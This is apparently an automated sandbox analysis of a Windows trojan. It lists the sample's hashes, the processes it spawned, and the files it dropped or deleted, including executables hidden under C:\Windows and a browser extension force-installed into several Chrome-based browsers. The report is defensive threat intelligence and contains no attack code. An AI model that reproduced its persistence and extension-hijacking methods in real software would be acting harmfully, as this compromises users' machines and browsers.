MD5: 3e733861cf8347465a0c4e0be2d4b521
SHA1: bb25e4d6570afc4d0f1123205e202989f0dc553c
SHA256: a679439ed8a2736bd2c286a72d033cc2b6dadb55a7b409e47706faed981cda49
SSDeep: 12288:hoefCqAzDIq3dHnJL3J6VS3CuDTmrIgaUy9heM:hoM6zsqtHnN3uSyuDTmrIgV
Size: 761856 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: MicrosoftWindowsShortcutfile, MicrosoftVisualC, MicrosoftVisualCv50v60MFC, MicrosoftVisualC50, Armadillov171, UPolyXv05_v6
Company: Nasofalo
Created at: 2016-10-21 10:25:46
Analyzed on: Windows7 SP1 32-bit

Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

Process activity

The Trojan creates the following process(es):

tqgb.exe:2772
WScript.exe:1884
src2011.tmp:3204
src2011.exe:3012
1819.exe:2816
rundll32.exe:2060
%original file name%.exe:2948
mm.exe:2928
regsvr32.exe:3384
regsvr32.exe:3208
xPiSs.exe:3932
mmc.exe:3004
guide.exe:2212
guide.exe:3788

The Trojan injects its code into the following process(es):
No processes have been created.

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process WScript.exe:1884 makes changes in the file system.
The Trojan deletes the following file(s):

C:\Windows\1819.exe (0 bytes)
C:\Windows\tem.vbs (0 bytes)

The process src2011.tmp:3204 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Roaming\473213\RLDataView.d (438 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\473213\resource\is-FAS25.tmp (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\473213\extensions\is-CTDCH.tmp (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\473213\resource\DirectUI\is-MJGBG.tmp (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\473213\extensions\int2\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\jychromeex\res\is-0VP5H.tmp (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-OMIPG.tmp\ISTask.dll (687 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\473213\resource\is-J28MR.tmp (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\473213\extensions\is-01FTN.tmp (57 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\473213\extensions\int2\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\jychromeex\_locales\en\is-VBM9M.tmp (294 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\473213\extensions\int2\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\jychromeex\is-UHB8T.tmp (230 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\473213\extensions\int2\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\jychromeex\is-NCP50.tmp (12 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\473213\resource\is-20T3A.tmp (520 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\473213\resource\is-02OSJ.tmp (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\473213\resource\is-C4M25.tmp (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\473213\extensions\int2\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\_metadata\is-TKHO0.tmp (18 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\473213\extensions\int2\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\jychromeex\is-ILCVQ.tmp (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\473213\extensions\chrome\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\_metadata\is-1I0SD.tmp (18 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\473213\jyueservice.exe (208 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\473213\extensions\is-KSONF.tmp (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\473213\extensions\int2\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\is-HG2NG.tmp (230 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\473213\extensions\chrome\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\res\is-CLNBN.tmp (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\473213\resource\is-O672V.tmp (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\473213\extensions\chrome\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\_locales\en\is-E1EH3.tmp (294 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\473213\is-4P1TV.tmp (3073 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\473213\jywebHelper. (376 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\473213\extensions\chrome\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\_locales\zh_CN\is-9SRI3.tmp (816 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\473213\extensions\chrome\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\is-KM7R2.tmp (230 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\473213\extensions\int2\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\jychromeex\_metadata\is-1CE92.tmp (18 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\473213\resource\is-C6MA6.tmp (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\473213\extensions\chrome\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\is-FPP5R.tmp (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\473213\extensions\int2\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\res\is-669ON.tmp (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\473213\extensions\int2\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\jychromeex\res\is-UTB4B.tmp (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\473213\resource\is-OJM14.tmp (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\473213\xmlconfig\is-HBL2N.tmp (663 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\473213\extensions\int2\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\jychromeex\is-PMUMK.tmp (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\473213\extensions\int2\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\_locales\en\is-UGJFV.tmp (294 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\473213\is-42QG3.tmp (4185 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\473213\extensions\int2\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\res\is-R6K8A.tmp (88 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\473213\chromeNativeClient\is-QCFIG.tmp (412 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\473213\is-R4UO6.tmp (13800 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\473213\extensions\is-3VJA0.tmp (56 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\473213\extensions\chrome\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\is-AMVGA.tmp (12 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\473213\extensions\int2\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\is-Q7MA6.tmp (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\473213\resource\DirectUI\is-HJ25S.tmp (594 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\473213\extensions\chrome\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\is-ITCRM.tmp (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\473213\is-6G1GU.tmp (3361 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\473213\extensions\int2\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\is-8NPD8.tmp (18 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\473213\is-QPVIT.tmp (601 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\473213\extensions\int2\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\is-2BM18.tmp (12 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\473213\resource\is-O9BG9.tmp (601 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\473213\extensions\chrome\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\is-IEEEV.tmp (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\473213\extensions\int2\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\jychromeex\_locales\zh_CN\is-8BCSI.tmp (816 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\473213\is-UNSUO.tmp (11168 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\473213\extensions\int2\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\_metadata\is-2AIAO.tmp (40 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\473213\extensions\int2\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\is-4159G.tmp (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\473213\resource\is-I5T5P.tmp (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\473213\extensions\int2\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\jychromeex\is-K372N.tmp (18 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\473213\is-E0HRH.tmp (1281 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\473213\is-AJCA6.tmp (3361 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\473213\extensions\chrome\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\is-MBJU2.tmp (18 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-OMIPG.tmp\_isetup\_shfoldr.dll (47 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\473213\chromeNativeClient\is-GF3CF.tmp (1425 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\473213\is-VGUEH.tmp (2105 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\473213\resource\is-BFJBC.tmp (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\473213\extensions\int2\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\jychromeex\_metadata\is-I1VK9.tmp (40 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\473213\resource\is-KTQ2I.tmp (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\473213\xmlconfig\is-NNO2O.tmp (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\473213\is-G8HVS.tmp (2321 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\473213\extensions\int2\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\jychromeex\is-JRQE4.tmp (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\473213\extensions\int2\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\is-SIQ7T.tmp (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\473213\extensions\chrome\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\res\is-IH47N.tmp (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\473213\resource\is-N6BD7.tmp (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\473213\resource\DirectUI\is-2SP90.tmp (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\473213\resource\DirectUI\is-A29B6.tmp (594 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\473213\extensions\int2\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\_locales\zh_CN\is-MD2UI.tmp (816 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\473213\extensions\chrome\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\_metadata\is-0H4IE.tmp (40 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\473213\is-O0M9S.tmp (2321 bytes)

The Trojan deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-OMIPG.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-OMIPG.tmp\ISTask.dll (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-OMIPG.tmp\_isetup\_shfoldr.dll (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\473213\RLDataView.dll (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-OMIPG.tmp\_isetup (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\473213\jywebHelper.dll (0 bytes)

The process src2011.exe:3012 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-AC6LT.tmp\src2011.tmp (1423 bytes)

The Trojan deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-AC6LT.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-AC6LT.tmp\src2011.tmp (0 bytes)

The process 1819.exe:2816 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Windows\kBqJzF\MIJ.exe (108 bytes)
C:\Windows\Media\McIe.wav (17 bytes)
C:\Windows\Media\Mcfg.wav (1 bytes)
C:\Windows\tem.vbs (169 bytes)
C:\Windows\kBqJzF\BPp.exe (108 bytes)
C:\Windows\pcq.exe (108 bytes)
C:\Windows\onest.txt (1 bytes)
C:\Windows\kBqJzF\LiveUDHelper.dll (1 bytes)
C:\Windows\mcconfig.dat (2 bytes)
C:\Windows\kBqJzF\G57.exe (108 bytes)
C:\Windows\kBqJzF\PTR.exe (108 bytes)
C:\Windows\kBqJzF\xPiSs.exe (218 bytes)
C:\Windows\Media\hd.wav (1 bytes)
C:\Windows\kBqJzF\27e.exe (108 bytes)
C:\Windows\kBqJzF\Dqc.exe (108 bytes)
C:\Windows\kBqJzF\drH.exe (108 bytes)

The process rundll32.exe:2060 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\GameExplorer\{259407C2-8FA0-425C-9A68-FD1873827037}\PlayTasks\0\Play.lnk (756 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Games\Steam Dark Messiah Might and Magic Single Playerâ„¢.lnk (280 bytes)
C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B912B2C6928A18B8CD7D50CF08BEA95B_481E03432F6D1AE9D28AB3294512C01D (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\1DAF2884EC4DFA96BA4A58D4DBC9C406 (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B912B2C6928A18B8CD7D50CF08BEA95B_481E03432F6D1AE9D28AB3294512C01D (1848 bytes)
C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\1DAF2884EC4DFA96BA4A58D4DBC9C406 (804 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\TarC072.tmp (2712 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\CabC071.tmp (51 bytes)

The Trojan deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\TarC072.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\CabC071.tmp (0 bytes)

The process %original file name%.exe:2948 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\src2011[1].exe (564208 bytes)
C:\Windows\mm.exe (299 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\1819[1].exe (527707 bytes)
C:\Windows\src2011.exe (50 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\yy[1].txt (196 bytes)
C:\Windows\1819.exe (50 bytes)

The process mm.exe:2928 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Windows\WindowsUpdate\tqgb.exe (31632 bytes)

The process xPiSs.exe:3932 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Windows\onest.txt (1 bytes)
C:\Windows\Report.log (7 bytes)
C:\Windows\kBqJzF\LiveUDHelper.dll (1 bytes)

The process mmc.exe:3004 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Windows\st.dat (75 bytes)
C:\Windows\Media\[fafk4].mp3 (1 bytes)
C:\Windows\star.dat (44 bytes)
C:\Windows\webpid.txt (4 bytes)

The process guide.exe:2212 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\76b40\jychromeex_remove\_metadata\computed_hashes.json (1060 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\76b40\jychromeex_remove\manifest.json (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\360chrome\Chrome\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\contentscript.js (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\UCBrowser\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\background.html (230 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\360chrome\Chrome\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\res\icon.gif (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\_metadata\computed_hashes.json (40 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\360se6\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\popup.html (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\_locales\en\messages.json (294 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\76b40\jychromeex_remove\res\icon.gif (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\76b40\jychromeex_remove\background.html (230 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\360se6\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\manifest.json (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\UCBrowser\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\contentscript.js (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\76b40\cupdate.dat (157 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\jychromeex\popup.html (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Tencent\QQBrowser\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\_locales\zh_CN\messages.json (816 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Tencent\QQBrowser\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\_metadata\verified_contents.json (18 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Tencent\QQBrowser\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\manifest.json (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\360chrome\Chrome\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\background.js (45 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\76b40\jychromeex_update\popup.html (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\jychromeex\_locales\en\messages.json (294 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Tencent\QQBrowser\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\res\icon.gif (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\76b40\jychromeex_update\_locales\zh_CN\messages.json (816 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\jychromeex\manifest.json (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\_locales\zh_CN\messages.json (816 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\360chrome\Chrome\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\_locales\en\messages.json (294 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\76b40\jychromeex_create\background.js (772 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\UCBrowser\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\res\icon.gif (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\76b40\jychromeex_remove\popup.html (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\76b40\jychromeex_create\_locales\zh_CN\messages.json (816 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\76b40\jychromeex_update\manifest.json (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\background.js (45 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\contentscript.js (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences (8270 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\360se6\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\calmath.js (12 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\360se6\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\_metadata\computed_hashes.json (40 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\76b40\jychromeex_create\background.html (230 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Tencent\QQBrowser\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\_locales\en\messages.json (294 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\76b40\jychromeex_remove\_locales\zh_CN\messages.json (816 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\76b40\jychromeex_update\_metadata\computed_hashes.json (1060 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\76b40\jychromeex_update\_metadata\verified_contents.json (580 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\jychromeex\res\icon.gif (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\76b40\jychromeex_update\res\icon.gif (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\76b40\jychromeex_update\res\crx.png (88 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\popup.html (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\360chrome\Chrome\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\background.html (230 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\360se6\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\res\crx.png (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Tencent\QQBrowser\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\calmath.js (12 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\360se6\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\_locales\en\messages.json (294 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\360chrome\Chrome\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\calmath.js (12 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\76b40\jychromeex_create\popup.html (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\UCBrowser\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\calmath.js (12 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\UCBrowser\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\manifest.json (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\360chrome\Chrome\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\_metadata\verified_contents.json (18 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\76b40\jychromeex_create\res\icon.gif (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\360chrome\Chrome\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\_metadata\computed_hashes.json (40 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\UCBrowser\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\_locales\zh_CN\messages.json (816 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\76b40\jychromeex_remove\_locales\en\messages.json (294 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\res\crx.png (88 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\UCBrowser\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\popup.html (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\UCBrowser\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\_metadata\computed_hashes.json (40 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Tencent\QQBrowser\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\_metadata\computed_hashes.json (40 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\360chrome\Chrome\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\_locales\zh_CN\messages.json (816 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\jychromeex\contentscript.js (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\76b40\jychromeex_create\_locales\en\messages.json (294 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\res\icon.gif (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\UCBrowser\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\_metadata\verified_contents.json (18 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\UCBrowser\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\_locales\en\messages.json (294 bytes)
C:\Users\"%CurrentUserName%"\AppData\LocalLow\jyrl\config\rili.ini (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\76b40\jychromeex_remove\_metadata\verified_contents.json (580 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\76b40\jychromeex_create\res\crx.png (196 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Tencent\QQBrowser\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\contentscript.js (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\76b40\jychromeex_update\background.js (772 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\360chrome\Chrome\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\popup.html (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\76b40\jychromeex_create\_metadata\computed_hashes.json (1060 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Tencent\QQBrowser\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\background.html (230 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\76b40\jychromeex_create\manifest.json (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\360se6\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\background.js (45 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\76b40\jychromeex_update\_locales\en\messages.json (294 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\360se6\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\_locales\zh_CN\messages.json (816 bytes)
